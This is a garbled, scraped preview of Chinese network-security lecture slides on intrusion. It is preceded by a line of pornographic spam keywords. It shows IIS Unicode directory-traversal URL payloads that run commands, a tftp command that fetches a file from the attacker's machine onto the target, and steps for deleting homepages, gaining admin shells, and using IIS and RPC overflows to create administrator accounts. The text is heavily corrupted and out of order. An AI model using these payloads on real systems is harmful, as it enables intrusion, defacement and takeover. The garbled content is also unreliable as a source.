freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

第7講網(wǎng)絡(luò)入侵-預(yù)覽頁

2025-08-25 15:11 上一頁面

下一頁面
 

【正文】 識(shí)的人都不難理解其中的“笑話”,奇怪的是卻屢屢有人上當(dāng),究其原因,就是因?yàn)閲说呢澬”阋诵睦碜魉?。由于他的電腦水平不高,前不久被一個(gè)初學(xué)者駭客入侵了機(jī)器。 物理安全比較難防,因?yàn)楣敉鶃碜阅軌蚪佑|到物理設(shè)備的用戶。其實(shí)不然,用普通用戶帳號(hào)登錄后,可以利用工具 者新建一個(gè)具有管理員權(quán)限的用戶。 16 字典文件 一次字典攻擊能否成功,很大因素上決定與字典文件。目前有很多工具軟件專門來創(chuàng)建字典文件。這些文檔密碼可以有效的防止文檔被他人使用和閱讀。 22 Unicode漏洞專題 通過打操作系統(tǒng)的補(bǔ)丁程序,就可以消除漏洞。 23 Unicode漏洞的檢測(cè)方法 使用掃描工具 XScan來檢測(cè) Unicode漏洞是否存在。比如: /scripts/..%c0%2f../winnt/system32/?/c+dir 其 中 /scripts目錄是 IIS提供的可以執(zhí)行命令的一個(gè)有執(zhí)行程序權(quán)限的一個(gè)目錄 26 Unicode漏洞的檢測(cè)方法 scripts目錄一般系統(tǒng)盤根目錄下的 Ipub目錄下 27 Unicode漏洞的檢測(cè)方法 在 Windows的目錄中,可以使用 “ ../” 來訪問上一級(jí)目錄 在瀏覽器中利用“ scripts/../../” 可以訪問到系統(tǒng)盤根目錄,訪問“ scripts/../../winnt/system32” 就訪問到系統(tǒng)的system32了,在 system32目錄下包含許多重要的系統(tǒng)文件,比如 cmd、 命令,可以利用該文件新建用戶,刪除文件等操作。 28 Unicode漏洞 此漏洞從中文 +SP6開始,還影響中文 WIN2022+、中文 WIN2022++SP1,臺(tái)灣繁體中文也同樣存在這樣的漏洞。 system32/?/c+type+c:\ 31 利用漏洞刪除主頁 利用 Unicode可以方便的更改對(duì)方的主頁,若對(duì)方網(wǎng)站的根路徑在“ C:\Initpub\root” (系統(tǒng)默認(rèn))下,可以刪除該路徑下的文件“ ” 來刪除主頁,這里的“ ” 文件是 IIS的默認(rèn)啟動(dòng)頁面。 需要上傳一個(gè)名為“ ” 的文件,為了上傳這個(gè)文件,首先在本地計(jì)算機(jī)上搭建一個(gè) TFTP服務(wù)器,它一般用來傳輸單個(gè)文件。在瀏覽器中執(zhí)行命令: “ 2/?/c+tftp+i++get+” , 命令其實(shí)是 “ tftp –i get ”意思是從 38 上載文件并查看成果 39 入侵對(duì)方主機(jī) 拷貝 C:\,在命令行下執(zhí)行: “ ” , 連接成功后就直接進(jìn)入了對(duì)方的 DOS命令行下,而且具有管理員權(quán)限。 工具: ,格式是: iis 0 參數(shù) 1:是目標(biāo)的 IP地址, 參數(shù) 2:目標(biāo)系統(tǒng)的補(bǔ)丁號(hào) 因?yàn)?,這里就是 0。下面介紹利用 SMB協(xié)議讓對(duì)方操作系統(tǒng)系統(tǒng)重新啟動(dòng)或者藍(lán)屏。 這項(xiàng)攻擊對(duì)技術(shù)要求比較高,但是攻擊的過程卻非常簡(jiǎn)單。存在strcpy函數(shù)這樣問題的 C語言函數(shù)還有: strcat()、 gets()、scanf()等。 48 用 RPC漏洞建立超級(jí)用戶 RPC溢出漏洞,對(duì) SP4也適用,必須打?qū)S醚a(bǔ)丁。攻擊的結(jié)果將在對(duì)方計(jì)算機(jī)上建立一個(gè)具有管理員權(quán)限的用戶,并終止了對(duì)方的 RPC服務(wù)。 點(diǎn)擊按鈕“ IDQ溢出”,出現(xiàn)攻擊成功的提示框 52 利用 IIS溢出進(jìn)行攻擊 53 利用 IIS溢出進(jìn)行攻擊 現(xiàn) 813端口已經(jīng)開放,可用 ,將會(huì)自動(dòng)執(zhí)行剛才發(fā)送的命令“ dir c:\” ,其語法: vv 813 其中 vv是程序的參數(shù), 813是目標(biāo)端口。先修改本地系統(tǒng)時(shí)間到 2022年。 58 拒絕服務(wù)攻擊 DoS( Denial of Service):凡是造成目標(biāo)計(jì)算機(jī)拒絕提供服務(wù)的攻擊都稱為 DoS攻擊,其目的是使目標(biāo)計(jì)算機(jī)或網(wǎng)絡(luò)無法提供正常的服務(wù)。 59 本章習(xí)題 簡(jiǎn)述社會(huì)工程學(xué)攻擊的原理。 簡(jiǎn)述拒絕服務(wù)的種
點(diǎn)擊復(fù)制文檔內(nèi)容
公司管理相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖鄂ICP備17016276號(hào)-1